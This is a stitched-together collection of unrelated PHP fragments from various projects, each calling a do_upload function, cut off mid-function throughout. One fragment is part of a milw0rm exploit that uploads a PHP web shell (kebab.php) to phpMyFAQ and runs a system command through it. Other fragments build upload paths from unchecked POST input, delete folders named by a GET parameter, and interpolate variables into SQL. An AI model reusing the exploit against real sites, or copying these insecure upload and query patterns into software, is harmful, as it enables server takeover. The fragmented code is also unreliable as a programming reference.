function content() { if (!user_logged_in()) { return must_log_in(); } $errors = array(); if (array_key_exists('upload', $_POST)) { if (!array_key_exists('file', $_FILES) || filesize($_FILES['file']['tmp_name']) == 0) { $errors[] = 'Please supply a file'; } if (count($errors) == 0) { preg_match('/\\.([^\\/.]+)$/', $_FILES['file']['name'], $matches); $file_id = do_upload($_FILES['file']['tmp_name'], $_FILES['file']['type'], $matches[1], $_FILES['file']['size']); page_header('File uploaded'); ?> <?php return; } } page_header('Upload file'); show_error_list($errors); ?> <form enctype="multipart/form-data" action="" method="post"> <div class="fieldrow"> <div> <label for="file">Select an image <span class="label-extra">(size limit: 8MB)</span></label> <input id="file" name="file" type="file" /> </div> </div> <div class="fieldrow"> <input type="submit" name="upload" value="Upload" /> </div> </form> <?php }
$query = squery("SELECT t.id,t.randcode,t.status,t.title,t.description,t.unick,t.ufullname,t.uemail,t.uphone,t.uip,t.rep_u,\nt.rep_g,t.open_time,t.opened_by,t.is_real,t.is_private,t.email_upd,t.memo_upd,c1.name AS cat1_name,c2.name AS cat2_name,c3.name AS \ncat3_name,s.status_name,up.priority_name AS upriority,sp.priority_name AS priority,c3.extra,t.ext1,t.ext2,t.ext3,t.merged_to,t.cc,\ng.private_actions,t.lastupd_time \nFROM (karnaf_tickets AS t INNER JOIN karnaf_cat3 AS c3 ON c3.id=t.cat3_id INNER JOIN karnaf_cat2 AS c2 ON c2.id=c3.parent \nINNER JOIN karnaf_cat1 AS c1 ON c1.id=c2.parent INNER JOIN karnaf_statuses AS s ON s.status_id=t.status INNER JOIN karnaf_priorities AS up ON \nup.priority_id=t.upriority INNER JOIN karnaf_priorities AS sp ON sp.priority_id=t.priority LEFT JOIN groups AS g ON g.name=t.rep_g) WHERE t.id=%d", $id); if ($result = sql_fetch_array($query)) { if (!$isoper && $randcode != $result['randcode'] && ($nick != $result['unick'] || $nick == "Guest" || $a_regtime > (int) $result['open_time'])) { AccessDenied("You must provide the ticket verification code to view this page."); } if (isset($_POST['reply_text']) && !empty($_POST['reply_text']) && $result['status'] != 0) { squery("INSERT INTO karnaf_replies(tid,reply,r_by,r_time,r_from,ip) VALUES(%d,'%s','%s',%d,'%s','%s')", $id, $_POST['reply_text'], $nick, time(), $nick, get_session_ip()); if ((int) $result['status'] == 2) { squery("UPDATE karnaf_tickets SET status=1,lastupd_time=%d WHERE id=%d AND status=2", time(), $id); send_memo($result['rep_u'], "User has replied to ticket #" . $result['id'] . ". For more information visit: " . KARNAF_URL . "/edit.php?id=" . $result['id']); } echo "<div class=\"status\">Your reply has been saved.</div><br>"; $result['status'] = 1; } if (isset($_FILES['attachment-file']['name']) && !empty($_FILES['attachment-file']['name'])) { $error = do_upload($id); if ($error == "") { if ((int) $result['status'] == 2) { squery("UPDATE karnaf_tickets SET status=1,lastupd_time=%d WHERE id=%d AND status=2", time(), $id); send_memo($result['rep_u'], "User has added an attachment to ticket #" . $result['id'] . ". For more information visit: " . KARNAF_URL . "/edit.php?id=" . $result['id']); } echo "<div class=\"status\">Your attachment has been saved.</div><br>"; } else { echo "<div class=\"status_err\">Error: " . $error . "</div><br>"; } } if ($isoper) { if (IsGroupMember($result['rep_g']) || IsKarnafAdminSession()) { $isadmin = 1; } if ($result['is_private'] && !$isadmin) {
} else { if ($_FILES['Filedata']) { $resource = fopen("log.txt", "a"); fwrite($resource, date("Ymd h:i:s") . "UPLOAD - {$_SERVER['REMOTE_ADDR']}" . $_FILES['Filedata']['name'] . " " . $_FILES['Filedata']['type'] . "\n"); fclose($resource); $file_type = $_FILES['Filedata']['type']; $file_name = $_FILES['Filedata']['name']; $file_ext = strtolower(substr($file_name, strrpos($file_name, "."))); //File Size Check if ($_FILES['Filedata']['size'] > $MAX_SIZE) { $message = "The file size is over 2MB."; } else { if (!in_array($file_type, $FILE_MIMES) && !in_array($file_ext, $FILE_EXTS)) { $message = "Sorry, {$file_name}({$file_type}) is not allowed to be uploaded."; } else { $message = do_upload($upload_dir, $upload_url); } } print "<script>window.location.href='{$url_this}?message={$message}'</script>"; } else { if (!$_FILES['Filedata']) { } else { $message = "Invalid File Specified."; } } } /************************************************************ * List Files ************************************************************/ $handle = opendir($upload_dir); $filelist = "";
if (isset($_GET['delFolder']) && isset($_GET['dir'])) { delete_folder($_GET['delFolder']); } if (isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) { $dirPathPost = $_POST['dirPath']; if (strlen($dirPathPost) > 0) { if (substr($dirPathPost, 0, 1) == '/') { $FILE_ROOT .= $dirPathPost; } else { $FILE_ROOT = $dirPathPost; } } if (strrpos($FILE_ROOT, '/') != strlen($FILE_ROOT) - 1) { $FILE_ROOT .= '/'; } do_upload($_FILES['upload'], $BASE_DIR . $BASE_ROOT . $dirPathPost . '/'); } function do_upload($file, $dest_dir) { global $clearUploads; if (is_file($file['tmp_name'])) { //var_dump($file); echo "DIR:$dest_dir"; move_uploaded_file($file['tmp_name'], $dest_dir . $file['name']); } $clearUploads = true; } function delete_folder($folder) { global $BASE_DIR, $refresh_dirs; //var_dump($BASE_DIR); $del_folder = dir_name($BASE_DIR) . $folder;
echo "=> Uploading file.\n"; $result = curl_exec($ch); curl_close($ch); @unlink("kebab.php"); $get = $baseurl . "/attachments/1337/kebab.php\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $get); curl_setopt($ch, CURLOPT_PROXY, $proxy); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if (strstr($result, "Un1q")) { echo substr($result, 4); } else { echo "Not vulnerable / error ?\n"; } curl_close($ch); } if ($argc < 3) { printf("Usage: %s http://test.com/phpmyfaq/ \"<? system('uname -a'); ?> \" [proxy]\n", $argv[0]); exit(0); } if ($argc == 4) { $proxy = $argv[3]; } else { $proxy = ""; } do_upload($argv[1], $proxy, $argv[2]); ?> # milw0rm.com [2007-03-01]
} } // action defaults to 'showdir' if (is_null($action)) { $action = 'showdir'; } } switch ($action) { case 'showdir': do_showdir(); break; case 'showupload': do_showupload(); break; case 'upload': do_upload(); break; case 'showmkdir': do_showmkdir(); break; case 'mkdir': do_mkdir(); break; case 'showrename': do_showrename(); break; case 'rename': do_rename(); break; case 'showmove': do_showmove();
if ($upload_album_cover == 'no') { $show_audio_done = 1; $show_image_done = 0; $album_image_message = $config['album_image_message']; $template = "themes/{$user_theme}/templates/main_1.htm"; $inner_template1 = "themes/{$user_theme}/templates/inner_upload_audio_complete.htm"; $TBS = new clsTinyButStrong(); $TBS->NoErr = true; $TBS->LoadTemplate("{$template}"); $TBS->Render = TBS_OUTPUT; $TBS->Show(); @mysql_close(); die; } else { if ($_FILES['userfile']) { $album_cover_change = do_upload($upload_dir); $album_image_message = $album_cover_change[0]; $album_new_pic = $album_cover_change[1]; $upload_proceed = $album_cover_change[2]; } } if ($upload_proceed == true) { // update audio_albums table album cover image $sql_image = "UPDATE audio_albums SET album_picture = '{$album_new_pic}' WHERE album_id = '{$album_id}'"; $query_image = @mysql_query($sql_image); $show_image_done = 1; $album_image_message = $config['album_image_message']; $template = "themes/{$user_theme}/templates/main_1.htm"; $inner_template1 = "themes/{$user_theme}/templates/inner_upload_audio_complete.htm"; $TBS = new clsTinyButStrong(); $TBS->NoErr = true;
function upload() { global $mosConfig_absolute_path; if (isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) { $dirPathPost = $_POST['dirPath']; if (strlen($dirPathPost) > 0) { if (substr($dirPathPost, 0, 1) == '/') { $IMG_ROOT .= $dirPathPost; } else { $IMG_ROOT = $dirPathPost; } } if (strrpos($IMG_ROOT, '/') != strlen($IMG_ROOT) - 1) { $IMG_ROOT .= '/'; } do_upload($_FILES['upload'], $mosConfig_absolute_path . '/images/stories/' . $dirPathPost . '/'); } }
$name = trim($name, ": "); if (in_array($name, $grab)) { $auth[$name] = trim($parts[1]); } } return $auth; } $auth = do_auth(); printf(" \n **** parsed auth headers for PUT **** \n"); print_r($auth); $ch2 = curl_init(); // get all files in css dir $files = array(); // load everything from local css folder into // <storage-url>/asset/css/local-file-path foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator('css')) as $path) { $filename = sprintf("%s", $path); $pos = strrpos($filename, "/"); if ($pos !== false) { $last = substr($filename, $pos + 1); if ($last == '.' || $last == '..') { printf(" ignore file :: %s \n", $filename); } else { array_push($files, $filename); } } } foreach ($files as $file) { do_upload($ch2, $auth, $file); } curl_close($ch2);
function upload() { josSpoofCheck(); if (isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) { $dirPathPost = $_POST['dirPath']; $file = $_FILES['upload']; if (strlen($dirPathPost) > 0) { if (substr($dirPathPost, 0, 1) == '/') { $IMG_ROOT .= $dirPathPost; } else { $IMG_ROOT = $dirPathPost; } } if (strrpos($IMG_ROOT, '/') != strlen($IMG_ROOT) - 1) { $IMG_ROOT .= '/'; } do_upload($file, COM_MEDIA_BASE . $dirPathPost . '/'); } }
private function get_info_product($user) { $image = do_upload(); $product_info = array('name' => $this->input->post('name'), 'area_id' => $this->input->post('area'), 'category_id' => $this->input->post('category'), 'feild_id' => $this->input->post('feild'), 'created_date' => date('Y-m-d', time()), 'end_date' => $this->input->post('enddate'), 'content' => $this->input->post('content'), 'user_id' => $user['id'], 'image' => rand(1, 50) . '', 'active' => 0); return $product_info; }
function get_auth() { global $filepath; if (USERNAME == 'free' && PASSWORD == 'free') { $command = CURL_BIN . ' -A ' . CURL_USERAGENTS . ' -s -F "op=api_get_limits" ' . CURL_STARTURL; } else { $command = CURL_BIN . ' -A ' . CURL_USERAGENTS . ' -s -F "op=api_get_limits" -F "login='******'" -F "password='******'" ' . CURL_STARTURL; } $xml = exec($command, $out); $str = implode("\n", $out); $xml = xml2array($str); if (!array_key_exists('Data', $xml)) { print_log('Cannot retrieve XML data. Exit.', 'get_auth', 0, true); } if (empty($xml['Data']['ServerURL']) || empty($xml['Data']['MaxUploadFilesize'])) { print_log('Important XML value is empty.', 'get_auth', 0, false); print_log('Uploading aborted. Exit.', 'get_auth', 0, true); } $xml_error = $xml['Data']['Error']; $xml_sessid = $xml['Data']['SessionID']; $xml_server = $xml['Data']['ServerURL']; $xml_maxsize = $xml['Data']['MaxUploadFilesize']; print_log('---------------------------------------------------------------------------', 'get_auth', 1, false); print_log('ServerURL : ' . $xml_server, 'get_auth', 1, false); print_log('SessionID : ' . $xml_sessid, 'get_auth', 1, false); print_log('MaxSize : ' . $xml_maxsize . ' MB', 'get_auth', 1, false); print_log('---------------------------------------------------------------------------', 'get_auth', 1, false); if (empty($xml_error)) { if (empty($xml_sessid)) { print_log('Uploading with free user account.', 'get_auth', 1, false); do_upload($filepath, $xml_sessid, $xml_server, $xml_maxsize); } else { print_log('Uploading with registered user account.', 'get_auth', 1, false); do_upload($filepath, $xml_sessid, $xml_server, $xml_maxsize, false); } } else { if ($xml_error == 'auth_error') { print_log('Username/password invalid. Exit.', 'get_auth', 0, true); } } }
exec("{$xgettext_executable} `find -name \"*.php\" -o -name \"*.inc\"` -p {$dyn_locales_dir}/ -o messages.pot --keyword=_ -L PHP --add-comments=TRANSLATORS 2>&1", $exec_out, $ret_var); if ($ret_var) { echo "<center>" . _("Strings <b>not</b> rebuilt!") . "</center><br>" . _("This is the <code>xgettext</code> output:") . "<br><br>"; echo "<pre>"; foreach ($exec_out as $v) { echo html_safe($v) . "\n"; } echo "</pre><br>"; } else { echo "<p>" . _("<code>xgettext</code> ran successfully.") . "</p>"; } echo "<p><a href='{$translate_url}'>" . _("Back to the Translation Center") . "</a></p>"; } else { if ($func == "upload") { $locale = validate_locale($_REQUEST['locale']); do_upload($locale); echo "<p><a href='{$translate_url}?func=manage&locale={$locale}'>" . sprintf(_("Back to manage locale %s"), $locale) . "</a></p>"; } else { if ($func == "merge") { $locale = validate_locale($_REQUEST['locale']); $fuzzy = @$_REQUEST['fuzzy']; do_merge($locale, $fuzzy); echo "<p><a href='{$translate_url}?func=manage&locale={$locale}'>" . sprintf(_("Back to manage locale %s"), $locale) . "</a></p>"; } else { if ($func == "manage") { $locale = validate_locale($_REQUEST['locale']); manage_form($locale); } } } }